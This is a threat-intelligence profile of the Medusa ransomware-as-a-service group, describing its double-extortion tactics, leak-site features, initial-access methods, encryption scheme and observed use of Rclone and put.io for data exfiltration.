Medusa ransomware is a RaaS operation that emerged in 2022 but gained notoriety in 2023. The group participates in the double extortion method, where victim’s data is stolen and leaked if the ransom is not paid. The group has reportedly demanded between $100,000 and $15 million. The group reportedly gives victims 10 days to pay and charges $10,000 per day if the victim wants to extend the deadline.
There is a similarly named RaaS operation, MedusaLocker; there are mixed reports related to the connection between the two operations, with many reporters considering them the same. MedusaLocker has been active since, at least, 2019.
Medusa likely gets their name from the Greek Gorgon bearing the same name. Medusa is generally portrayed as a female with living snakes for hair; mythology indicates that Medusa was cursed causing everything she looked at to turn to stone. Within the Medusa binary is the term “gaze” in the debug path in PEStudio. Additionally, the logo on the group’s data leak site is a profile silhouette of Medusa.
Medusa Ransomware’s data leak site includes the following information within a victim’s post:
- Price tag
- Countdown
- Number of visitors
- Victim’s name and description
Additionally, Medusa has been reported to offer options on their posts – a fee of $10,000 to extend the time before the data is leaked, a request to delete the data, and an option to download the data.
Medusa Ransomware operators have been reported to leak sensitive data via social media, such as X (formerly Twitter) and using a Telegram channel.
Affiliates of the Medusa ransomware have been observed gaining initial access via exploiting vulnerabilities, social engineering attacks, and deploying web shells that deploy the ransomware payload.
Medusa ransomware uses RSA asymmetric encryption for protecting the AES256 key used for encrypting the victim’s files. The AES256 key is set up using a 32-byte key and a 16-byte initialization vector. If the group names a victim on their data leak site, they include the ransom demand, the countdown to the full leak, the number of visitors to the post, and the name and description of the organization. Counting the number of visitors likely increases the pressure on the victim due to the perception of a growing number of people accessing sensitive data.
In July 2024, Dark Atlas security researchers identified a security gap in Medusa’s infrastructure, which provided additional insight into the group’s operations. Researchers were ale to access Medusa’s cloud account and access data the group had been exfiltrating.
The group identified the group had used Rclone to exfiltrate data from victims. Additionally, the group had used the put.io service to exfiltrate data from the domain controller.
